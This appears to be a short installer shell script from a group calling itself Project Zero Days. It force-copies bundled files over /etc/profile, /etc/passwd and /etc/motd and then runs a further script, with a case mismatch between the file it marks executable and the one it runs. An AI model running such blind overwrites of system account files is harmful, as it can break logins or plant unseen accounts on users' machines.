#!/bin/ash

# License: GNU public
# Creator: Project Zero Days
# Github:  https://Github.com/ProjectZeroDays
# Website: https://ProjectZeroDays.com
# Email:   Info@ProjectZeroDays.com
# Secure:  ProjectZeroDays@pm.me
# Twitter: @ProjectZeroDays
# Reddit:  @ProjectZeroDays
# DEV:     @ProjectZeroDays 

#Change Directory to SYS/
cd SYS/ && \

# SYS Files to /etc 
cp -f profile /etc/profile && \
cp -f passwd /etc/passwd && \
cp -f motd /etc/motd && \
clear && \

# Making Make-Exec Executable 
chmod +x Make-Exec && \

# Running MAKE-EXEC Script
sh MAKE-EXEC 
